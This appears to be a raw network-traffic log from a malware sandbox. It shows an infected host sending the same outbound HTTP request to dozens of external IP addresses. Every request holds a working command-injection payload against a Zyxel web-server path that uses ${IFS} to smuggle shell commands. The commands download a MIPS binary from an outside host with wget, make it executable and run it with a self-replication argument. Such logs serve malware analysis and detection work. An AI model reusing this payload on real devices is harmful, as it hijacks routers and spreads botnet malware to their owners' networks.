                                      Jan 19, 2024 17:29:34.819626093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4995192.168.2.1453802171.55.24.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.819653034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4996192.168.2.1450594192.156.138.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.819706917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4997192.168.2.1437798171.139.19.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.819739103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4998192.168.2.1459038102.168.173.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.819777966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4999192.168.2.145130278.165.182.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.819823980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5000192.168.2.145156671.40.244.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.819864988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5001192.168.2.144801260.130.87.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.819907904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5002192.168.2.144845045.39.175.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.819967031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5003192.168.2.1451904198.44.10.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.819986105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5004192.168.2.144182635.43.99.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.820003033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5005192.168.2.1450412125.215.133.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.820044041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5006192.168.2.145685077.81.2.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.820087910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5007192.168.2.145753043.226.201.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.820158005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5008192.168.2.145502048.43.64.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.820178032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5009192.168.2.1436532121.128.13.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.820221901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5010192.168.2.1436388151.179.53.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.820256948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5011192.168.2.1460814121.55.245.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.820305109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5012192.168.2.1442772167.149.204.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.820353031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5013192.168.2.145858053.100.60.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.820383072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5014192.168.2.1456632166.57.171.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.820422888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5015192.168.2.146065020.181.35.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.820432901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5016192.168.2.145057650.74.81.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.820482969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5017192.168.2.145550440.244.118.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.820545912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5018192.168.2.1445936105.70.219.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.820570946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5019192.168.2.1447906179.131.61.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.820615053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5020192.168.2.143598085.83.43.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.820653915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5021192.168.2.1444710121.50.130.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.820744991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5022192.168.2.1460726195.48.84.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.820770979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5023192.168.2.1447118209.128.39.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.820806980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5024192.168.2.1434388106.41.205.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.820853949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5025192.168.2.145241680.120.173.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.820899010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5026192.168.2.1460920171.31.182.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.820946932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5027192.168.2.143851240.57.242.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.820976973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5028192.168.2.1444110213.181.173.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.821032047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5029192.168.2.1450312209.113.210.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.821069002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5030192.168.2.144976620.161.92.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.821119070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5031192.168.2.1455972152.145.233.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.821170092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5032192.168.2.1433554120.51.154.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.821182013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5033192.168.2.1433462173.206.122.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.821233988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5034192.168.2.1433968210.10.34.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.821270943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5035192.168.2.145165450.58.115.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.821321011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5036192.168.2.1454360220.165.131.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.821369886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5037192.168.2.1447160113.66.129.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.821398020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5038192.168.2.143911031.97.67.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.821429968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5039192.168.2.1438024188.123.93.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.821469069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5040192.168.2.1452834162.234.20.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.821535110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5041192.168.2.1460134164.44.223.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.821552992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5042192.168.2.1460680208.23.49.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.821619987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5043192.168.2.143370878.165.212.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.821645975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5044192.168.2.145354486.107.249.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.821690083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5045192.168.2.1450888161.224.20.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.821748018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5046192.168.2.144695279.191.78.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.821784019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5047192.168.2.1452914162.26.160.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.821846008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5048192.168.2.145319291.59.106.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.821899891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5049192.168.2.145626058.0.90.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.821923018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5050192.168.2.1455562102.54.147.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.821971893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5051192.168.2.1444898105.81.16.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.822009087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5052192.168.2.144873471.203.36.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.822053909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5053192.168.2.143555444.28.32.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.822076082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5054192.168.2.144592858.97.150.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.822097063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5055192.168.2.1449860221.169.89.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.822133064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5056192.168.2.1436838134.96.225.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.822173119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5057192.168.2.143955489.238.164.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:34.822220087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5058192.168.2.1455830133.1.41.37443
                                      TimestampBytes transferredDirectionData
